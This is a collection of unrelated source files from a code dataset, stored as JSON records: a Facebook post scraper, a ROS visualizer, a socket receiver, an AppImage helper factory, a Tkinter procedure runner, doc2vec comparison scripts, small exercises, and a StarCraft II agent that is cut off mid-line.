timestamp or 'min' in timestamp:\n minute = timestamp.split(' ')[0]\n timeInt = (datetime.datetime.now() - datetime.timedelta(minutes=int(minute))).strftime('%Y-%m-%d %H:%M')\n # Yesterday at 12:32 AM\n elif 'Yesterday' in timestamp:\n hour = timestamp.split('at')[1].split(':')[0].strip()\n if hour:\n if timestamp.split('at')[1].split(':')[1].split(' ')[1].strip() == 'PM':\n hour = str(int(hour) + 12)\n if hour == \"24\":\n hour = \"00\"\n minute = timestamp.split('at')[1].split(':')[1].split(' ')[0].strip()\n timeInt = (datetime.datetime.today() - datetime.timedelta(days=1)).strftime(\n '%Y-%m-%d') + \" \" + hour + \":\" + minute\n # Apr 22 or July 2012 or 22 Apr\n elif len(timestamp.split(\" \")) == 2:\n year = time.strftime('%Y', time.localtime(time.time()))\n month, day = timestamp.split(\" \")\n try:\n int(day)\n except:\n temp = month\n month = day\n day = temp\n if re.match(r\"[0-9]{4}\", day):\n year = day\n day = \"1\"\n month = check_month(month)\n timeInt = year + \"-\" + month + \"-\" + day\n else:\n timeInt = time.strftime('%Y-%m-%d %H:%M', time.localtime(time.time()))\n return timeInt\nres = ''\nwith open('content_json.txt',encoding='utf-8') as f:\n res += f.readline()\n\nres = res.replace('for (;;);', '')\nres = json.loads(res)\nhtml = res['payload']['actions'][0]['html']\nsoup = BeautifulSoup(html,\"html.parser\",from_encoding='utf-8')\nfor article in soup.find_all('article'):\n selector = Selector(text=str(article))\n post_id_pattern = selector.xpath('.//@data-ft').get()\n if post_id_pattern:\n post_id = re.search('\"tl_objid\":\"(.+?)\"', post_id_pattern).group(1)\n else:\n post_id = ''\n stamp_time = selector.xpath(\".//div/a/abbr/text()\").get()\n if stamp_time:\n timestamp = stamp_time\n TimeStamp = change_timestamp(timestamp)\n try:\n datetime_obj = datetime.datetime.strptime(TimeStamp, '%Y-%m-%d %H:%M')\n except:\n datetime_obj = datetime.datetime.strptime(TimeStamp, '%Y-%m-%d')\n TimeStampInt = int(time.mktime(datetime_obj.timetuple()) * 1000.0)\n else:\n timestamp = 'Now'\n TimeStamp = change_timestamp(timestamp)\n datetime_obj = datetime.datetime.strptime(TimeStamp, '%Y-%m-%d %H:%M')\n TimeStampInt = int(time.mktime(datetime_obj.timetuple()) * 1000.0)\n\n # location\n location = selector.xpath(\".//div/div[2]/div[1]/a/text()\").get()\n if location is None:\n location = ''\n # like_people_num\n like_relation_pattern = selector.xpath(\".//footer\")\n like_people_num = 0\n if len(like_relation_pattern) > 0:\n if like_relation_pattern.xpath(\".//a/@href\").get():\n comment_url = 'https://m.facebook.com' + like_relation_pattern.xpath(\".//a/@href\").get()\n else:\n comment_url = \"\"\n if like_relation_pattern.xpath(\".//a//div/text()\").get():\n like_people_num = like_relation_pattern.xpath(\".//a//div/text()\").get()\n if 'K' in like_people_num:\n like_people_num = int(re.search('\\d+', like_people_num).group(0)) * 1000\n else:\n like_people_num = int(re.search('\\d+', like_people_num).group(0))\n\n else:\n like_people_num = 0\n comment_num = like_relation_pattern.xpath('.//div[@class=\"_1fnt\"]/span[@data-sigil=\"comments-token\"]/text()')\n if comment_num:\n comments_people = comment_num.get()\n # print(comments_people)\n if 'Comments' in comments_people:\n comments_people = (comments_people.split(' ')[0])\n # print(comments_people_)\n if 'K' in comments_people:\n comments_people_num = float(re.search('\\d+(\\.\\d+)?', comments_people).group(0)) * 1000\n comments_people_num = int(comments_people_num)\n else:\n comments_people_num = int(re.search('\\d+(\\.\\d+)?', comments_people).group(0))\n else:\n comments_people_num = 0\n else:\n comments_people_num = 0\n # the title of post\n title = \"\"\n retweetFromName = ''\n isRetweet = False\n retweetContent = ''\n img_content = []\n screen_urp = selector.xpath('.//strong/a/@href').get()\n screen_name = screen_urp.split('?')[0].split('/')[1]\n screen_url = 'https://m.facebook.com' + screen_urp\n is_retweet_article = selector.xpath(\"//article\")\n if len(is_retweet_article) == 2:\n is_retweet_article = is_retweet_article[-1]\n isRetweet = True\n retweetFromName = is_retweet_article.xpath(\".//h3/strong/a/text()\").get()\n retweetContent = is_retweet_article.xpath(\".//p/text()\").get()\n content = selector.xpath(\"string(.//div/div[1]/span/p)\").get()\n else:\n content = selector.xpath(\".//p/text()\").get()\n # img_content = selector.xpath(\"//div/div[2]//img/@src\").getall()\n post_images_array = []\n post_images = selector.xpath('.//div/div[2]//div//i/@style').get()\n if post_images:\n if 'static.xx' not in post_images:\n post_images = post_images.replace('\\'', '\"')\n post_images = post_images.replace(\"\\\\3a \", \":\")\n post_images = post_images.replace(\"\\\\3d \", \"=\")\n post_images = post_images.replace(\"\\\\26 \", \"&\")\n post_images = post_images.replace(\"\\\\\", \"\")\n post_images = re.search(r'url\\(\"(.+?)\"', post_images).group(1)\n post_images_array.append(post_images)\n print('1')","sub_path":"fb/content_json.py","file_name":"content_json.py","file_ext":"py","file_size_in_byte":10012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"503359567","text":"#! /usr/bin/env python\n'''\nCreated on Apr 28, 2020\n\n@author: kyberszittya\n'''\n\nimport rospy\n\nfrom rei_monitoring_msgs.msg import DetectedObstacles\nfrom visualization_msgs.msg import MarkerArray, Marker\n\nclass PerceptionVisualizer(object):\n \n def __init__(self):\n self.msg_viz = MarkerArray()\n self.pub_obstacle_publisher = rospy.Publisher(\"/rei_perception/viz\", MarkerArray, queue_size=1) \n self.sub_detected_obstacles = rospy.Subscriber(\"/rei_perception_monitor/detected_obstacles\", DetectedObstacles, self.cbDetectedObstacles)\n \n \n \n def cbDetectedObstacles(self, data):\n self.msg_viz.markers = []\n for o in data.obstacles:\n m = Marker()\n m.header.frame_id = data.header.frame_id\n m.header.stamp = data.header.stamp\n m.pose = o.pose\n m.type = Marker.SPHERE\n m.scale.x = 1.0\n m.scale.y = 1.0\n m.scale.z = 1.0\n \n m.color.r = 1.0\n m.color.g = 0.0\n m.color.b = 0.0\n m.color.a = 1.0\n \n self.msg_viz.markers.append(m)\n self.pub_obstacle_publisher.publish(self.msg_viz)\n\ndef main():\n rospy.init_node(\"perception_visualization\")\n visualizer = PerceptionVisualizer()\n rospy.spin()\n \n \nif __name__==\"__main__\":\n main()\n\n","sub_path":"rei/rei_perception_monitor/scripts/visualization/perception_visualization.py","file_name":"perception_visualization.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"546490073","text":"# Helper to receive packets\n# This class object creates a thread to listen on a socket, and passes all messages from the socket to the manager\n\nimport sys, time\nimport threading\nimport socket, select\n# our own custom libraries/modules\nfrom protocol.protocol import *\n\nclass Receiver:\n\n def __init__(self, manager, sock):\n self.manager = manager # save the manager so we can reference it later to pass messages\n self.sock = sock\n\n # create the thread and begin listening on socket\n def beginListening(self):\n sock = self.sock\n manager = self.manager\n\n # function to hold the thread\n def listenFunc():\n while True:\n time.sleep(0.0) # wait interval\n\n # if the manager signifies that the program is over, kill this thread\n if (manager.kill):\n break;\n\n # we attempt to receive the next message\n try:\n hasr, _, _ = select.select([sock], [], [])\n # check to make sure a message exists to be received\n if hasr:\n r = sock.recv(1024) # get a message\n if (len(r) == 0): continue # ignore if no message\n r = r.decode() # get the message\n\n self.processMessage(r) # send the message to process\n except Exception:\n # an exception occurs if we were unable to read from the socket, signifiying something went wrong (most likely the socket closed/server died)\n manager.kill = True\n break\n\n\n # create the thread with the function we defined\n self.thread = threading.Timer(0.0, listenFunc, () )\n self.thread.start()\n\n def processMessage(self, message):\n # pass message to manager\n self.manager.processMessage(message)\n\n\n","sub_path":"tictactwo/client/handlers/recv.py","file_name":"recv.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"385165962","text":"# Copyright 2020 Alexis Lopez Zubieta\n#\n# Permission is hereby granted, free of charge, to any person obtaining a\n# copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation the\n# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or\n# sell copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\nfrom .interpreter import Interpreter\nfrom .base_helper import BaseHelper\nfrom .fontconfig import FontConfig\nfrom .gstreamer import GStreamer\nfrom .java import Java\nfrom .libgl import LibGL\nfrom .openssl import OpenSSL\nfrom .qt import Qt\nfrom .gdk_pixbuf import GdkPixbuf\nfrom .gtk import Gtk\nfrom .glib_schemas import GLibSchemas\n\n\nclass HelperFactoryError(RuntimeError):\n pass\n\n\nclass HelperFactory:\n def __init__(self, app_dir, app_dir_cache):\n self.app_dir = app_dir\n self.app_dir_cache = app_dir_cache\n\n self.helpers = {\n \"loader\": Interpreter,\n \"fontconfig\": FontConfig,\n \"openssl\": OpenSSL,\n \"qt\": Qt,\n \"libgl\": LibGL,\n \"gstreamer\": GStreamer,\n \"gdk_pixbuf\": GdkPixbuf,\n \"gtk\": Gtk,\n \"glib_schemas\": GLibSchemas,\n \"java\": Java,\n }\n\n def get(self, id) -> BaseHelper:\n if id in self.helpers:\n obj = self.helpers[id](self.app_dir, self.app_dir_cache)\n return obj\n else:\n raise HelperFactoryError(\"%s: unknown helper id\" % id)\n\n def list(self):\n return self.helpers.keys()\n","sub_path":"appimagebuilder/app_dir/runtime/helpers/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"162260261","text":"#05. n-gram\n#与えられたシーケンス(文字列やリストなど)からn-gramを作る関数を作成せよ.\n#この関数を用い,\"I am an NLPer\"という文から単語bi-gram,文字bi-gramを得よ.\n\nstr = 'I am an NLPer'\nword = str.split(' ')\n\ndef n_gram(list,n):\n gram = []\n for i in range(len(list) - n + 1):\n gram.append(list[i:i+n]) \n return gram\n\nif __name__ == \"__main__\":\n print(n_gram(str,2))\n print(n_gram(word,2))","sub_path":"section1/exercise5.py","file_name":"exercise5.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"198449411","text":"#!/usr/bin/python\r\n################################################################################\r\n# PROCEDURE EXECUTION\r\n#\r\n#\r\n# 11/05/2015 Original construction\r\n# 11/17/2015 Added CLI log data to status output\r\n################################################################################\r\n\r\nimport traceback\r\nimport time\r\n\r\nfrom Tkinter import *\r\nfrom globals import *\r\nfrom random import random\r\n\r\nfrom ..db.user import get_name as get_user_name\r\nfrom ..db.procedure import get_name as get_prc_name\r\nfrom ..db.host import get_host\r\nfrom ..db.result import (get_prc_gui_data, del_result)\r\nfrom ..db.queue import queue_procedure\r\nfrom ..db.logger import (add_message, get_message)\r\nfrom ..db.status import get_friendly_text\r\nfrom ..view.reports import ReportGenerator\r\nfrom .selection_gui import SelectionGUI\r\n\r\nfrom os import popen\r\n\r\nclass ProcedureExecution:\r\n def close(self):\r\n self.__master.destroy()\r\n\r\n def __display_worker(self):\r\n start_time = time.time()\r\n \r\n self.__output_text.delete(1.0, END)\r\n for procedure_uuid, procedure_value in self.procedure_selection.get_selected().iteritems():\r\n for host_uuid, host_value in self.host_selection.get_selected().iteritems():\r\n self.__output_text.insert(END, \"Procedure: {0}\\n Host: {1}\\n\".format(procedure_value, host_value))\r\n for row in get_prc_gui_data(procedure_uuid, host_uuid):\r\n timestamp = time.strftime('%H:%M:%S', time.localtime(int(float(row[3]))))\r\n self.__output_text.insert(END, \" {0:40} {1} {2}\\n\".format(row[6][:40], timestamp, row[5]))\r\n self.__output_text.see(END)\r\n \r\n self.__message_text.delete(1.0, END)\r\n messages = get_message(start_time = time.time() - 60, stop_time = time.time())\r\n for row in messages:\r\n timestamp = time.strftime('%H:%M:%S', time.localtime(int(float(row[0]))))\r\n for line in row[1].split(\"\\n\"):\r\n self.__message_text.insert(END, \"{0} {1}\\n\".format(timestamp, line))\r\n self.__message_text.see(END)\r\n \r\n self.__master.after(int(DISPLAY_WORKER_DELAY_MULT * (time.time() - start_time) * 1000 * (.5 + random())), self.__display_worker)\r\n \r\n def __run(self):\r\n self.__current_start_time = time.time()\r\n for procedure_uuid, procedure_value in self.procedure_selection.get_selected().iteritems():\r\n for host_uuid, host_value in self.host_selection.get_selected().iteritems():\r\n del_result(procedure_uuid = procedure_uuid, host_uuid = host_uuid)\r\n \r\n try:\r\n procedure_str = get_prc_name(procedure_uuid, self.__current_user_uuid)\r\n except Exception:\r\n procedure_str = \"procedure {0}\".format(procedure_uuid)\r\n \r\n try:\r\n host, name, owner, mode = get_host(host_uuid, self.__current_user_uuid)\r\n host_str = name\r\n except Exception:\r\n host_str = \"host {0}\".format(host_uuid)\r\n \r\n try:\r\n user_str = get_user_name(self.__current_user_uuid)\r\n except Exception:\r\n user_str = \"user {0}\".format(self.__current_user_uuid)\r\n \r\n try:\r\n queue_procedure(self.__current_user_uuid, host_uuid, procedure_uuid)\r\n except Exception:\r\n add_message(time.time(), \"Queuing {0}@{1}:{2} failed\\n{3}\".format(user_str, host_str, procedure_str, traceback.format_exc()))\r\n \r\n def __gen_report(self):\r\n report = ReportGenerator(\"temp.html\")\r\n \r\n host_uuids = []\r\n for host_uuid, host_value in self.host_selection.get_selected().iteritems():\r\n host_uuids.append(host_uuid)\r\n \r\n procedure_uuids = []\r\n for procedure_uuid, procedure_value in self.procedure_selection.get_selected().iteritems():\r\n procedure_uuids.append(procedure_uuid)\r\n \r\n report.write_procedure(procedure_uuids, host_uuids)\r\n \r\n report.close()\r\n \r\n def __init__(self, master, user_uuid):\r\n self.__master = master\r\n Grid.rowconfigure(self.__master, 0, weight = 1)\r\n Grid.rowconfigure(self.__master, 1, weight = 1)\r\n Grid.columnconfigure(self.__master, 0, weight = 1)\r\n Grid.columnconfigure(self.__master, 1, weight = 1)\r\n \r\n self.__current_user_uuid = user_uuid\r\n self.__current_start_time = time.time()\r\n \r\n #### PROCEDURES FRAME ################################\r\n procedures_frame = LabelFrame(self.__master, text = \"Procedures\", padx = 5, pady = 5)\r\n procedures_frame.grid(column = 0, columnspan = 1, row = 0, rowspan = 1, sticky = N + S + E + W) \r\n self.procedure_selection = SelectionGUI(procedures_frame)\r\n \r\n #### HOSTS FRAME #####################################\r\n hosts_frame = LabelFrame(self.__master, text = \"Hosts\", padx = 5, pady = 5)\r\n hosts_frame.grid(column = 0, columnspan = 1, row = 1, rowspan = 1, sticky = N + S + E + W) \r\n self.host_selection = SelectionGUI(hosts_frame)\r\n \r\n #### EXECUTE FRAME ###################################\r\n execute_frame = LabelFrame(self.__master, text = \"Execute\", padx = 5, pady = 5)\r\n execute_frame.grid(column = 1, columnspan = 1, row = 0, rowspan = 2, sticky = N + S + E + W)\r\n Grid.columnconfigure(execute_frame, 0, weight = 1)\r\n Grid.rowconfigure(execute_frame, 0, weight = 0)\r\n Grid.rowconfigure(execute_frame, 1, weight = 1)\r\n Grid.rowconfigure(execute_frame, 2, weight = 0)\r\n \r\n #### BUTTON FRAME ####################################\r\n button_frame = Frame(execute_frame)\r\n button_frame.grid(column = 0, columnspan = 1, row = 0, rowspan = 1, sticky = N + S + E + W)\r\n Grid.columnconfigure(button_frame, 0, weight = 1)\r\n Grid.columnconfigure(button_frame, 1, weight = 1)\r\n Grid.rowconfigure(button_frame, 0, weight = 1)\r\n \r\n run_btn = Button(button_frame, text = \"Run\", command = self.__run)\r\n run_btn.grid(column = 0, columnspan = 1, row = 0, rowspan = 1, sticky = N + S + E + W) \r\n \r\n gen_report_btn = Button(button_frame, text = \"Generate Report\", command = self.__gen_report)\r\n gen_report_btn.grid(column = 1, columnspan = 1, row = 0, rowspan = 1, sticky = N + S + E + W) \r\n \r\n #### OUTPUT FRAME ####################################\r\n output_frame = LabelFrame(execute_frame, text = \"Output\", padx = 5, pady = 5)\r\n output_frame.grid(column = 0, columnspan = 1, row = 1, rowspan = 2, sticky = N + S + E + W) \r\n self.__output_text = Text(output_frame, \\\r\n wrap = NONE, \\\r\n height = 10)\r\n self.__output_text.pack(expand = True, fill = \"both\")\r\n \r\n #### MESSAGE FRAME ###################################\r\n self.__message_frame = LabelFrame(self.__master, text = \"Messages\", padx = 5, pady = 5)\r\n self.__message_frame.grid(column = 0, columnspan = 2, row = 2, rowspan = 1, sticky = N + S + E + W) \r\n self.__message_text = Text(self.__message_frame, wrap = NONE, height = 10)\r\n self.__message_text.pack(expand = True, fill = \"both\")\r\n \r\n self.__master.after(0, self.__display_worker)","sub_path":"valarie/gui/procedure_execution.py","file_name":"procedure_execution.py","file_ext":"py","file_size_in_byte":7566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"406965024","text":"import time\nfrom bs4 import BeautifulSoup\n\nhtml = \"\"\"

test

\"\"\"\n\nstart_time = time.time()\nBeautifulSoup(html, 'lxml') # logic을 많이 알아야 사용가능 빠르지만 불편함\nlxml_end_time = time.time() - start_time\n\nstart_time = time.time()\nBeautifulSoup(html, 'html5lib') # 브라우저 기반에서 사용가능 느리지만 편함\nhtml5lib_end_time = time.time() - start_time\n\nprint('lxml 시간측정 : %f' %(lxml_end_time))\nprint('html5lib 시간측정 : %f' %(html5lib_end_time))\nprint(html5lib_end_time / lxml_end_time)\n\n\n# 라이브러리로 html을 tag형태로 만들어주는 시간\n# 어떤 파서 쓸지? 양쪽에서 다 되는지 - > 빠른 것 선택\n","sub_path":"12091906.py","file_name":"12091906.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"101895851","text":"class Solution(object):\n def compareVersion(self, version1, version2):\n \"\"\"\n :type version1: str\n :type version2: str\n :rtype: int\n \"\"\"\n v1_list = version1.split(\".\")\n v2_list = version2.split(\".\")\n \n for i in xrange(max(len(v1_list), len(v2_list))):\n v1 = v1_list[i] if i < len(v1_list) else 0\n v2 = v2_list[i] if i < len(v2_list) else 0\n if int(v1) < int(v2):\n return -1\n elif int(v1) > int(v2):\n return 1\n \n return 0","sub_path":"src/main/java/com/practice/python/compare_version_numbers.py","file_name":"compare_version_numbers.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"609299949","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n__author__ = \"MPZinke\"\n\n###########################################################################\n#\n#\tcreated by: MPZinke\n#\ton ..\n#\n#\tDESCRIPTION:\n#\tBUGS:\n#\tFUTURE:\n#\n###########################################################################\n\nfrom threading import Thread\nfrom time import sleep\n\nfrom Definitions import *\n\nimport AdafruitFeed\nimport DaytimeEvents\nimport ErrorWriter\nimport EventPredictor\n\n\ndef main():\n\t# program loop\n\twhile True:\n\t\ttry:\n\t\t\tthreads =\t[\n\t\t\t\t\t\t\tThread(target=AdafruitFeed.start_client_loop),\n\t\t\t\t\t\t\tThread(target=DaytimeEvents.sunrise_loop),\n\t\t\t\t\t\t\tThread(target=DaytimeEvents.sunset_loop),\n\t\t\t\t\t\t\tThread(target=EventPredictor.predictor_loop)\n\t\t\t\t\t\t]\n\t\t\tfor thread in threads:\n\t\t\t\tthread.start()\n\t\t\tfor thread in threads:\n\t\t\t\tthread.join()\n\n\t\texcept Exception as error:\n\t\t\ttry: ErrorWriter.write_error(error) # doubly protect main program loop\n\t\t\texcept: print(error)\n\t\tsleep(ERROR_WAIT) # something messed up; give it time to reset\n\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"DatabasePortal/Python/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"314262655","text":"'''Running and saving results explored in \n doc2vec_robustness_correlations.ipynb\n'''\n\n\nimport numpy as np\nimport os,sys\nimport pandas as pd\nimport glob\nfrom scipy.stats import pearsonr, spearmanr\nfrom scipy.spatial.distance import pdist,cdist\n\n\n## add src-path\n# src_dir = os.path.abspath(os.path.join(os.pardir,os.pardir,'src'))\n# sys.path[0] = src_dir\n\npath_data = os.path.abspath('/scratch2/gerlach/Dropbox (Uzzi Lab)/WoS/wos-text-dynamics-data/d2v-wos')\n\n\n## mapping of model and the corresponding filename\n\ndict_model_fname = {\n '100-5-5-0': \\\n ['doc_features_normed_100-5-5.npy.1M.lv_coords',\\\n 'doc_features_normed_100-5-5.npy.indices_1M',\\\n 'model_100-5-5.npy.docvecs.doctag_syn0.npy']\n}\n\n## parameters\nN = 10**6 ## number of subsampled vectors (fixed to 1M at the moment)\n\nN_pairs = 10**6 # howmany pairs to compare\n# n_seed = 10\nmetric = 'euclidean' # which metric to use, default: cosine\n\n## select 2 models\n\nlist_models = sorted(list(dict_model_fname.keys()))\nprint(list_models)\n\nfor i_m,model in enumerate(list_models):\n\n\n filename_save = 'doc2vec_2dproj_m%s_comparison_distances_%s_1M_N%s'\\\n %(model,metric,str(N_pairs))\n\n\n ## the 2D-projections - vectors\n ## these are 1M subsampled vectors\n path_read = os.path.join(path_data,model)\n fname_read = dict_model_fname[model][0]\n filename = os.path.join(path_read,fname_read)\n x= (np.loadtxt(filename))\n x_2D = x[1:,:]\n\n ## get corresponding indices in orginal dataset\n fname_read = dict_model_fname[model][1]\n filename = os.path.join(path_read,fname_read)\n with open(filename) as f:\n x=f.readlines()\n x_inds = [int(h) for h in x[0].split(',')]\n\n\n ## memory-map the original vectors\n fname_read = dict_model_fname[model][2] ## these are the normed vectors\n filename = os.path.join(path_read,fname_read)\n x1 = np.load(filename,mmap_mode='r')\n\n with open(filename_save,'w') as f:\n # np.random.seed(n_seed)\n i1,i2=0,0\n\n\n for i in range(N_pairs):\n i1,i2=0,0\n while i1 == i2:\n i1,i2 = np.random.randint(N,size=2)#np.random.choice(N,size=2,replace=False)\n \n ## distance in dataset 1\n vec1,vec2 = x_2D[i1],x_2D[i2]\n s1 = pdist([vec1,vec2],metric=metric)[0]\n \n ## distance in dataset 2\n vec1,vec2 = x1[x_inds[i1]],x1[x_inds[i2]]\n s2 = pdist([vec1,vec2],metric=metric)[0]\n\n # write to file\n f.write('%s \\t %s \\n'%(str(s1),str(s2)))","sub_path":"scripts/CORE/doc2vec_robustness_correlations_2dprojection.py","file_name":"doc2vec_robustness_correlations_2dprojection.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"115972099","text":"import requests\nimport pytest\nfrom endpoint.EndPointFactory import EndPoint\n\n\ndef test_books():\n response = requests.get(EndPoint.BASE_URI_API)\n print(\"\\nStatus Code = \", response.status_code)\n print(\"Request URL = \", response.url)\n\n data = response.json()\n print(data)\n\n da1 = data['books'][0]['isbn']\n da2 = data['books'][0]['title']\n da3 = data['books'][0]['subTitle']\n da4 = data['books'][0]['author']\n da5 = data['books'][0]['publish_date']\n da6 = data['books'][0]['publisher']\n da7 = data['books'][0]['pages']\n da8 = data['books'][0]['description']\n da9 = data['books'][0]['website']\n\n assert da1 == EndPoint.isbn and type(da1) == str\n assert da2 == EndPoint.title and type(da2) == str\n assert da3 == EndPoint.subTitle and type(da3) == str\n assert da4 == EndPoint.author and type(da4) == str\n assert da5 == EndPoint.publish_date and type(da5) == str\n assert da6 == EndPoint.publisher and type(da6) == str\n assert da7 == EndPoint.pages and type(da7) == int\n assert da8 == EndPoint.description and type(da8) == str\n assert da9 == EndPoint.website and type(da9) == str\n","sub_path":"feature/test_API.py","file_name":"test_API.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"19815516","text":"import random\nimport time\nimport math\nimport os.path\n\nimport numpy as np\nimport pandas as pd\n\nfrom pysc2.agents import base_agent\nfrom pysc2.env import sc2_env, run_loop\nfrom pysc2.lib import actions, features, units\nfrom absl import app\n\nimport torch\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom s10395.skdrl.pytorch.model.mlp import NaiveMultiLayerPerceptron\nfrom s10395.skdrl.common.memory.memory import ExperienceReplayMemory\nfrom s10395.skdrl.pytorch.model.dqn import DQN, prepare_training_inputs\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n#writer = SummaryWriter()\n\nclass ProtossAgentWithRawActsAndRawObs(base_agent.BaseAgent):\n actions = (\"do_nothing\",\n \"harvest_minerals\",\n \"build_pylon\",\n \"build_gateway\",\n \"train_zealot\",\n \"attack\")\n\n def get_my_units_by_type(self, obs, unit_type):\n return [unit for unit in obs.observation.raw_units\n if unit.unit_type == unit_type\n and unit.alliance == features.PlayerRelative.SELF]\n\n def get_enemy_units_by_type(self, obs, unit_type):\n return [unit for unit in obs.observation.raw_units\n if unit.unit_type == unit_type\n and unit.alliance == features.PlayerRelative.ENEMY]\n\n def get_my_completed_units_by_type(self, obs, unit_type):\n return [unit for unit in obs.observation.raw_units\n if unit.unit_type == unit_type\n and unit.build_progress == 100\n and unit.alliance == features.PlayerRelative.SELF]\n\n def get_enemy_completed_units_by_type(self, obs, unit_type):\n return [unit for unit in obs.observation.raw_units\n if unit.unit_type == unit_type\n and unit.build_progress == 100\n and unit.alliance == features.PlayerRelative.ENEMY]\n\n def get_distances(self, obs, units, xy):\n units_xy = [(unit.x, unit.y) for unit in units]\n return np.linalg.norm(np.array(units_xy) - np.array(xy), axis=1)\n\n def step(self, obs):\n super(ProtossAgentWithRawActsAndRawObs, self).step(obs)\n if obs.first():\n nexus = self.get_my_units_by_type(\n obs, units.Protoss.Nexus)[0]\n self.base_top_left = (nexus.x < 32)\n\n def do_nothing(self, obs):\n return actions.RAW_FUNCTIONS.no_op()\n\n def harvest_minerals(self, obs):\n probes = self.get_my_units_by_type(obs, units.Protoss.Probe)\n idle_probes = [probe for probe in probes if probe.order_length == 0]\n if len(idle_probes) > 0:\n mineral_patches = [unit for unit in obs.observation.raw_units\n if unit.unit_type in [\n units.Neutral.BattleStationMineralField,\n units.Neutral.BattleStationMineralField750,\n units.Neutral.LabMineralField,\n units.Neutral.LabMineralField750,\n units.Neutral.MineralField,\n units.Neutral.MineralField750,\n units.Neutral.PurifierMineralField,\n units.Neutral.PurifierMineralField750,\n units.Neutral.PurifierRichMineralField,\n units.Neutral.PurifierRichMineralField750,\n units.Neutral.RichMineralField,\n units.Neutral.RichMineralField750\n ]]\n probe = random.choice(idle_probes)\n distances = self.get_distances(obs, mineral_patches, (probe.x, probe.y))\n mineral_patch = mineral_patches[np.argmin(distances)]\n return actions.RAW_FUNCTIONS.Harvest_Gather_unit(\n \"now\", probe.tag, mineral_patch.tag)\n return actions.RAW_FUNCTIONS.no_op()\n\n def build_pylon(self, obs):\n pylons = self.get_my_units_by_type(obs, units.Protoss.Pylon)\n probes = self.get_my_units_by_type(obs, units.Protoss.Probe)\n if (len(pylons) == 0 and obs.observation.player.minerals >= 100 and\n len(probes) > 0):\n pylon_xy = (22, 26) if self.base_top_left else (35, 42)\n distances = self.get_distances(obs, probes, pylon_xy)\n probe = probes[np.argmin(distances)]\n return actions.RAW_FUNCTIONS.Build_Pylon_pt(\n \"now\", probe.tag, pylon_xy)\n elif (len(pylons) == 1 and obs.observation.player.minerals >= 100 and\n len(probes) > 0):\n pylon_xy = (18, 26) if self.base_top_left else (38, 42)\n distances = self.get_distances(obs, probes, pylon_xy)\n probe = probes[np.argmin(distances)]\n return actions.RAW_FUNCTIONS.Build_Pylon_pt(\n \"now\", probe.tag, pylon_xy)\n elif (len(pylons) == 2 and obs.observation.player.minerals >= 100 and\n len(probes) > 0):\n pylon_xy = (24, 26) if self.base_top_left else (41, 42)\n distances = self.get_distances(obs, probes, pylon_xy)\n probe = probes[np.argmin(distances)]\n return actions.RAW_FUNCTIONS.Build_Pylon_pt(\n \"now\", probe.tag, pylon_xy)\n return actions.RAW_FUNCTIONS.no_op()\n\n def build_gateway(self, obs):\n completed_pylons = self.get_my_completed_units_by_type(\n obs, units.Protoss.Pylon)\n gateways = self.get_my_units_by_type(obs, units.Protoss.Gateway)\n probes = self.get_my_units_by_type(obs, units.Protoss.Probe)\n if (len(completed_pylons) > 0 and len(gateways) == 0 and\n obs.observation.player.minerals >= 150 and len(probes) > 0):\n gateway_xy = (22, 24) if self.base_top_left else (35, 44)\n distances = self.get_distances(obs, probes, gateway_xy)\n probe = probes[np.argmin(distances)]\n return actions.RAW_FUNCTIONS.Build_Gateway_pt(\n \"now\", probe.tag, gateway_xy)\n elif (len(completed_pylons) > 1 and len(gateways) == 1 and\n obs.observation.player.minerals >= 150 and len(probes) > 0):\n gateway_xy = (24, 24) if self.base_top_left else (33, 44)\n distances = self.get_distances(obs, probes, gateway_xy)\n probe = probes[np.argmin(distances)]\n return actions.RAW_FUNCTIONS.Build_Gateway_pt(\n \"now\", probe.tag, gateway_xy)\n return actions.RAW_FUNCTIONS.no_op()\n\n def train_zealot(self, obs):\n completed_gateways = self.get_my_completed_units_by_type(\n obs, units.Protoss.Gateway)\n free_pylon = (obs.observation.player.food_cap -\n obs.observation.player.food_used)\n zealots = self.get_my_completed_units_by_type(obs, units.Protoss.Zealot)\n if (len(completed_gateways) > 0 and obs.observation.player.minerals >= 100\n and free_pylon > 10 and (len(zealots)%2)==0):\n gateway = self.get_my_units_by_type(obs, units.Protoss.Gateway)[0]\n if gateway.order_length < 5:\n return actions.RAW_FUNCTIONS.Train_Zealot_quick(\"now\", gateway.tag)\n elif (len(completed_gateways) > 1 and obs.observation.player.minerals >= 100\n and free_pylon > 0 and (len(zealots)%2)==1):\n gateway = self.get_my_units_by_type(obs, units.Protoss.Gateway)[1]\n if gateway.order_length < 5:\n return 